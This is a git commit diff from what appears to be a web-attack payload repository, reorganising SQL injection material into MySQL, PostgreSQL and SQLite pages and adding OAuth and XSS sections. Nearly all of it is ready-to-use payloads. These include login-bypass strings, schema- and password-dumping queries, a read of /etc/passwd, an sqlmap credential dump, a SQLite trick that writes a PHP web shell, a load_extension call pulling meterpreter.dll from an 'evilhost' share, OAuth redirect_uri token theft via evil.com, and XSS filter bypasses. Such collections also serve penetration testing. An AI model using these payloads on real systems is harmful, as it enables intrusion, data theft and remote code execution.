SQL injections payloads separated + OAuth
parent
2fa9683b8c
commit
7d67aa4e0d
|
@ -0,0 +1,33 @@
|
|||
# OAuth 2 - Common vulnerabilities
|
||||
|
||||
## Grabbing OAuth Token via redirect_uri
|
||||
```
|
||||
https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful
|
||||
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost
|
||||
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com
|
||||
https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com
|
||||
```
|
||||
Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri:
|
||||
```
|
||||
https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com
|
||||
```
|
||||
|
||||
## Executing XSS via redirect_uri
|
||||
```
|
||||
https://example.com/oauth/v1/authorize?[...]&redirect_uri=data%3Atext%2Fhtml%2Ca&state=<script>alert('XSS')</script>
|
||||
```
|
||||
|
||||
## OAuth private key disclosure
|
||||
Some Android/iOS app can be decompiled and the OAuth Private key can be accessed.
|
||||
|
||||
## Authorization Code Rule Violation
|
||||
```
|
||||
The client MUST NOT use the authorization code more than once.
|
||||
If an authorization code is used more than once, the authorization server MUST deny the request
|
||||
and SHOULD revoke (when possible) all tokens previously issued based on that authorization code.
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
|
||||
* http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html
|
||||
* http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html
|
|
@ -8,6 +8,10 @@ Last modifications :
|
|||
* Methodology added
|
||||
* AWS Bucket added
|
||||
|
||||
|
||||
Extract nice bypass from https://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
|
||||
|
||||
|
||||
# Tools
|
||||
|
||||
* [Web Developper](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/)
|
||||
|
|
|
@ -1,77 +0,0 @@
|
|||
'-'
|
||||
' '
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
' or ''-'
|
||||
' or '' '
|
||||
' or ''&'
|
||||
' or ''^'
|
||||
' or ''*'
|
||||
"-"
|
||||
" "
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
" or ""-"
|
||||
" or "" "
|
||||
" or ""&"
|
||||
" or ""^"
|
||||
" or ""*"
|
||||
or true--
|
||||
" or true--
|
||||
' or true--
|
||||
") or true--
|
||||
') or true--
|
||||
' or 'x'='x
|
||||
') or ('x')=('x
|
||||
')) or (('x'))=(('x
|
||||
" or "x"="x
|
||||
") or ("x")=("x
|
||||
")) or (("x"))=(("x
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1#
|
||||
or 1=1/*
|
||||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
admin' or '1'='1
|
||||
admin' or '1'='1'--
|
||||
admin' or '1'='1'#
|
||||
admin' or '1'='1'/*
|
||||
admin'or 1=1 or ''='
|
||||
admin' or 1=1
|
||||
admin' or 1=1--
|
||||
admin' or 1=1#
|
||||
admin' or 1=1/*
|
||||
admin') or ('1'='1
|
||||
admin') or ('1'='1'--
|
||||
admin') or ('1'='1'#
|
||||
admin') or ('1'='1'/*
|
||||
admin') or '1'='1
|
||||
admin') or '1'='1'--
|
||||
admin') or '1'='1'#
|
||||
admin') or '1'='1'/*
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
admin" --
|
||||
admin" #
|
||||
admin"/*
|
||||
admin" or "1"="1
|
||||
admin" or "1"="1"--
|
||||
admin" or "1"="1"#
|
||||
admin" or "1"="1"/*
|
||||
admin"or 1=1 or ""="
|
||||
admin" or 1=1
|
||||
admin" or 1=1--
|
||||
admin" or 1=1#
|
||||
admin" or 1=1/*
|
||||
admin") or ("1"="1
|
||||
admin") or ("1"="1"--
|
||||
admin") or ("1"="1"#
|
||||
admin") or ("1"="1"/*
|
||||
admin") or "1"="1
|
||||
admin") or "1"="1"--
|
||||
admin") or "1"="1"#
|
||||
admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
@ -0,0 +1,60 @@
|
|||
# MYSQL Injection
|
||||
|
||||
##MySQL Union Based
|
||||
```
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||
```
|
||||
|
||||
##MySQL Error Based - Basic
|
||||
```
|
||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||
```
|
||||
|
||||
##MYSQL Error Based - UpdateXML function
|
||||
```
|
||||
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
|
||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
|
||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
|
||||
```
|
||||
|
||||
##MYSQL Error Based - Extractvalue function
|
||||
```
|
||||
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||
```
|
||||
|
||||
##MYSQL Blind with MAKE_SET
|
||||
```
|
||||
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
||||
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
||||
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||
```
|
||||
|
||||
|
||||
##MYSQL Time Based
|
||||
```
|
||||
+BENCHMARK(40000000,SHA1(1337))+
|
||||
'%2Bbenchmark(3200,SHA1(1))%2B'
|
||||
```
|
||||
|
||||
|
||||
##MYSQL Read content of a file
|
||||
```
|
||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||
```
|
||||
|
||||
##MySQL DIOS - Dump in One Shot
|
||||
```
|
||||
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
||||
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
||||
```
|
|
@ -0,0 +1,9 @@
|
|||
# POSTGRESQL
|
||||
|
||||
##PostgreSQL Error Based - Basic
|
||||
```
|
||||
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||||
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||||
```
|
|
@ -1,8 +1,12 @@
|
|||
# SQL injection
|
||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||
|
||||
## Authentication bypass and Entry point detection
|
||||
## SQL injection using SQLmap
|
||||
```
|
||||
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
|
||||
```
|
||||
|
||||
## Entry point detection
|
||||
Detection of an SQL injection entry point
|
||||
```
|
||||
'
|
||||
|
@ -22,103 +26,88 @@ Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
|
|||
transformed into U+0027 APOSTROPHE (')
|
||||
```
|
||||
|
||||
|
||||
Authentication bypass - use the file "Authentication Bypass.txt"
|
||||
## Authentication bypass
|
||||
```
|
||||
SELECT id FROM users WHERE username='input1' AND password='input2'
|
||||
SELECT id FROM users WHERE username='' or true-- AND password='input2'
|
||||
'-'
|
||||
' '
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
' or ''-'
|
||||
' or '' '
|
||||
' or ''&'
|
||||
' or ''^'
|
||||
' or ''*'
|
||||
"-"
|
||||
" "
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
" or ""-"
|
||||
" or "" "
|
||||
" or ""&"
|
||||
" or ""^"
|
||||
" or ""*"
|
||||
or true--
|
||||
" or true--
|
||||
' or true--
|
||||
") or true--
|
||||
') or true--
|
||||
' or 'x'='x
|
||||
') or ('x')=('x
|
||||
')) or (('x'))=(('x
|
||||
" or "x"="x
|
||||
") or ("x")=("x
|
||||
")) or (("x"))=(("x
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1#
|
||||
or 1=1/*
|
||||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
admin' or '1'='1
|
||||
admin' or '1'='1'--
|
||||
admin' or '1'='1'#
|
||||
admin' or '1'='1'/*
|
||||
admin'or 1=1 or ''='
|
||||
admin' or 1=1
|
||||
admin' or 1=1--
|
||||
admin' or 1=1#
|
||||
admin' or 1=1/*
|
||||
admin') or ('1'='1
|
||||
admin') or ('1'='1'--
|
||||
admin') or ('1'='1'#
|
||||
admin') or ('1'='1'/*
|
||||
admin') or '1'='1
|
||||
admin') or '1'='1'--
|
||||
admin') or '1'='1'#
|
||||
admin') or '1'='1'/*
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
admin" --
|
||||
admin" #
|
||||
admin"/*
|
||||
admin" or "1"="1
|
||||
admin" or "1"="1"--
|
||||
admin" or "1"="1"#
|
||||
admin" or "1"="1"/*
|
||||
admin"or 1=1 or ""="
|
||||
admin" or 1=1
|
||||
admin" or 1=1--
|
||||
admin" or 1=1#
|
||||
admin" or 1=1/*
|
||||
admin") or ("1"="1
|
||||
admin") or ("1"="1"--
|
||||
admin") or ("1"="1"#
|
||||
admin") or ("1"="1"/*
|
||||
admin") or "1"="1
|
||||
admin") or "1"="1"--
|
||||
admin") or "1"="1"#
|
||||
admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
```
|
||||
|
||||
|
||||
# MYSQL
|
||||
MySQL Union Based
|
||||
```
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||
```
|
||||
|
||||
|
||||
MySQL Error Based - Basic
|
||||
```
|
||||
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
|
||||
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
|
||||
```
|
||||
|
||||
MYSQL Error Based - UpdateXML function
|
||||
```
|
||||
AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)-
|
||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)--
|
||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)--
|
||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)--
|
||||
AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)--
|
||||
```
|
||||
|
||||
MYSQL Error Based - Extractvalue function
|
||||
```
|
||||
AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))--
|
||||
AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||
```
|
||||
|
||||
MySQL Blind with MAKE_SET
|
||||
```
|
||||
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
||||
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
||||
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||
```
|
||||
|
||||
|
||||
MySQL Time Based
|
||||
```
|
||||
+BENCHMARK(40000000,SHA1(1337))+
|
||||
'%2Bbenchmark(3200,SHA1(1))%2B'
|
||||
```
|
||||
|
||||
|
||||
MySQL Read content of a file
|
||||
```
|
||||
' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
|
||||
```
|
||||
|
||||
MySQL DIOS - Dump in One Shot
|
||||
```
|
||||
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
||||
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
||||
```
|
||||
|
||||
# POSTGRESQL
|
||||
|
||||
PostgreSQL Error Based - Basic
|
||||
```
|
||||
,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)
|
||||
,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--
|
||||
,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)
|
||||
```
|
||||
|
||||
# SQLite
|
||||
Remote Command Execution using SQLite command - Attach Database
|
||||
```
|
||||
ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
|
||||
CREATE TABLE lol.pwn (dataz text);
|
||||
INSERT INTO lol.pwn (dataz) VALUES (‘<?system($_GET[‘cmd’]); ?>’);--
|
||||
```
|
||||
|
||||
Remote Command Execution using SQLite command - Load_extension
|
||||
```
|
||||
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
||||
```
|
||||
Note: By default this component is disabled
|
||||
|
||||
|
||||
# Other usefull payloads
|
||||
|
||||
Polyglot injection (multicontext)
|
||||
## Polyglot injection (multicontext)
|
||||
```
|
||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||
```
|
||||
|
|
|
@ -0,0 +1,14 @@
|
|||
# SQLite
|
||||
|
||||
##Remote Command Execution using SQLite command - Attach Database
|
||||
```
|
||||
ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
|
||||
CREATE TABLE lol.pwn (dataz text);
|
||||
INSERT INTO lol.pwn (dataz) VALUES (‘<?system($_GET[‘cmd’]); ?>’);--
|
||||
```
|
||||
|
||||
##Remote Command Execution using SQLite command - Load_extension
|
||||
```
|
||||
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
||||
```
|
||||
Note: By default this component is disabled
|
|
@ -67,7 +67,7 @@ Base64 encoded
|
|||
|
||||
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
|
||||
|
||||
With an additionl URL
|
||||
With an additional URL
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
```
|
||||
|
||||
|
@ -254,6 +254,13 @@ Bypass parenthesis for string - Firefox
|
|||
alert`1`
|
||||
```
|
||||
|
||||
|
||||
Bypass onxxxx= blacklist
|
||||
```
|
||||
<object onafterscriptexecute=confirm(0)>
|
||||
<object onbeforescriptexecute=confirm(0)>
|
||||
```
|
||||
|
||||
Bypass onxxx= filter with a null byte/vertical tab - IE/Safari
|
||||
```
|
||||
<img src='1' onerror\x00=alert(0) />
|
||||
|
|
Loading…
Reference in New Issue